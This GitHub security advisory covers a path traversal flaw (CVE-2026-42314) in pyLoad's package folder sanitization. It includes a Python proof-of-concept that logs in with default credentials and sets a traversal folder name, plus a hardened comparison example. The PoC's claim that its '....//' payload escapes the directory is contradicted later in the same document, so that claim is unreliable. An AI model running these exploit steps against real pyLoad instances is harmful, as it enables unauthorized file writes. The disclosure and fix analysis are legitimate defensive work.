
PyLoad Vulnerable to Path Traversal via Package Folder Name

Moderate severity GitHub Reviewed Published Apr 26, 2026 in pyload/pyload • Updated May 5, 2026

Package

pyload-ng (pip)

Affected versions

<= 0.5.0b3.dev79

Patched versions

0.5.0b3.dev100

Description

Insufficient sanitization of the package folder name in add_package() lets an authenticated user with ADD permission make pyLoad write downloaded files outside the configured download directory.

Affected Component

  • src/pyload/core/api/__init__.py
  • Function: add_package()

Description

Package folder names are sanitized with a chain of plain string replacements, which is insufficient:

folder = (
    folder.replace("http://", "")
    .replace("https://", "")
    .replace("../", "_")  # Bypassable!
    .replace("..\\", "_")
    .replace(":", "")
    .replace("/", "_")
    .replace("\\", "_")
)

The ../ replacement is bypassable because str.replace makes a single non-overlapping, left-to-right pass. In the pattern ....// the first ../ match starts at the third character, so that pass turns ....// into .._/ (partial removal), and the later / replacement turns it into ..__: the two-dot prefix survives. A bare .. is not caught at all, since a folder name consisting only of .. contains none of the search strings and reaches os.path.join unchanged, where the OS resolves it to the parent of the download directory.

Proof of Concept

Setup

pip install pyload-ng[all]
pyload -d &
# Default credentials: pyload / pyload

Exploit

#!/usr/bin/env python3
import requests

BASE_URL = "http://localhost:8000"
USERNAME = "pyload"
PASSWORD = "pyload"

session = requests.Session()

# Login
session.post(f"{BASE_URL}/login", data={
    "username": USERNAME,
    "password": PASSWORD
})

# Create a package, then set a malicious folder name.
# The pattern ....// bypasses the ../ replacement: the full replace chain
# turns this payload into ..__..__..__tmp_evil, so the two-dot prefixes survive.
folder_payload = "....//....//....//tmp/evil"

resp = session.post(f"{BASE_URL}/api/add_package", json={
    "name": "test_package",
    "links": ["http://example.com/file.txt"],
    "dest": 1  # Destination.QUEUE
})

package_id = resp.json()
print(f"Created package: {package_id}")

# Set malicious folder name
resp = session.post(f"{BASE_URL}/api/set_package_data", json={
    "package_id": package_id,
    "data": {"folder": folder_payload}
})

print(f"Set folder payload: {folder_payload}")
print(f"Response: {resp.status_code}")

# When download occurs, files will be written outside download dir
print("[+] When a file is downloaded, it will be written to manipulated path")
print("    The sanitized folder still contains '..' sequences that OS resolves")

Verification

Check where files would be written:

import os

download_dir = "/home/user/Downloads"
folder = "....//....//....//tmp/evil"

# Reproduce pyLoad's replace chain exactly. Order matters: the "../" pass
# runs before the "/" pass, so a partial match leaves the dots behind.
after_dotdot = folder.replace("../", "_")
print(f"After the ../ replacement: {after_dotdot}")
# Output: .._/.._/.._/tmp/evil

sanitized = (
    after_dotdot.replace("..\\", "_").replace(":", "").replace("/", "_").replace("\\", "_")
)
print(f"After pyLoad sanitization: {sanitized}")
# Output: ..__..__..__tmp_evil

# When pyLoad does os.path.join and then opens the file:
final_path = os.path.join(download_dir, sanitized)
print(f"Joined path: {final_path}")
# Output (POSIX): /home/user/Downloads/..__..__..__tmp_evil

# The two-dot prefixes survive the chain, but in this payload they sit inside a
# single path component. The OS only treats a component that is exactly ".." as
# the parent directory, and that case also passes the chain untouched, because
# "../" and "..\\" never match a bare "..":
print(os.path.normpath(os.path.join(download_dir, "..".replace("../", "_"))))
# Output (POSIX): /home/user
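The following is an added, stand-alone example that is not pyLoad's code and not part of the advisory. It serves both the Description paragraph on the ../ replacement and the Verification section above: it reproduces the quoted replace chain verbatim, joins the result to a constructed base directory, and puts it beside a hardened check of the kind a fix needs, which canonicalises the joined path and refuses anything that does not stay under the download directory. The base directory, the helper names and the sample folder names are assumptions made for the example; posixpath is used instead of os.path so the results are identical on every host (production code would additionally use os.path.realpath so symlinks are resolved before the containment check). It goes beyond the advisory's single payload by also feeding in a bare .., an absolute path and a backslash form, to show which inputs actually leave the base directory under each approach.

```python
import posixpath

# Constructed base directory for the example, not a real pyLoad setting.
DOWNLOAD_DIR = "/home/user/Downloads"


def vulnerable_sanitize(folder: str) -> str:
    """The replace chain quoted from add_package(), reproduced verbatim."""
    return (
        folder.replace("http://", "")
        .replace("https://", "")
        .replace("../", "_")
        .replace("..\\", "_")
        .replace(":", "")
        .replace("/", "_")
        .replace("\\", "_")
    )


def vulnerable_target(folder: str, base: str = DOWNLOAD_DIR) -> str:
    """Where the vulnerable chain ends up writing: sanitize, join, and let the
    path normaliser collapse any '..' component the way the OS would."""
    return posixpath.normpath(posixpath.join(base, vulnerable_sanitize(folder)))


def is_inside(base: str, path: str) -> bool:
    """True when path is base itself or a descendant of base."""
    base = posixpath.normpath(base)
    return path == base or path.startswith(base + "/")


def hardened_target(folder: str, base: str = DOWNLOAD_DIR) -> str:
    """Hardened variant (an assumed fix, not pyLoad's patch): canonicalise the
    joined path first, then refuse anything outside base. Backslashes are
    treated as separators so a Windows-style '..\\x' gets the same check.
    Rejects with ValueError instead of silently rewriting the name."""
    candidate = posixpath.normpath(posixpath.join(base, folder.replace("\\", "/")))
    if not is_inside(base, candidate):
        raise ValueError(f"folder {folder!r} escapes {base}")
    return candidate


# Constructed folder names: the advisory's payload plus the cases the
# replace chain does not handle.
SAMPLE_FOLDERS = [
    "movies",                      # benign
    "....//....//....//tmp/evil",  # payload from the advisory's PoC
    "..",                          # no slash, so no replace() fires
    "../secret",
    "..\\secret",
    "/etc",                        # an absolute second argument wins in join()
]


def compare(folders):
    """For each folder: (input, sanitized string, path the vulnerable code
    writes to, path the hardened check allows or 'REJECTED')."""
    rows = []
    for folder in folders:
        try:
            hardened = hardened_target(folder)
        except ValueError:
            hardened = "REJECTED"
        rows.append((folder, vulnerable_sanitize(folder), vulnerable_target(folder), hardened))
    return rows


if __name__ == "__main__":
    for folder, sanitized, vuln_path, hardened in compare(SAMPLE_FOLDERS):
        print(f"{folder!r:32} -> {sanitized!r:24} {vuln_path:44} {hardened}")
```

Running it shows that, of the constructed inputs, only the bare .. escapes through the vulnerable chain (it lands in /home/user); the advisory's payload collapses to the single component ..__..__..__tmp_evil inside the download directory. The hardened check rejects .., both ../secret spellings and /etc, and accepts movies and the payload, because its .... components are ordinary names once the path is canonicalised rather than string-rewritten.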

Impact

Authenticated users with ADD permission can:

  • Write files outside the download directory
  • Potentially overwrite system files (depending on permissions)
  • Clutter system directories with downloaded content

References

GammaC0de published to pyload/pyload Apr 26, 2026
Published to the GitHub Advisory Database May 5, 2026
Reviewed May 5, 2026
Last updated May 5, 2026

Severity

Moderate

CVSS overall score

6.5 / 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Weaknesses

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory located underneath a restricted parent directory, but does not properly neutralize special elements within the pathname that can cause it to resolve to a location outside the restricted directory.

CVE ID

CVE-2026-42314

GHSA ID

GHSA-97r3-5w84-r4q8
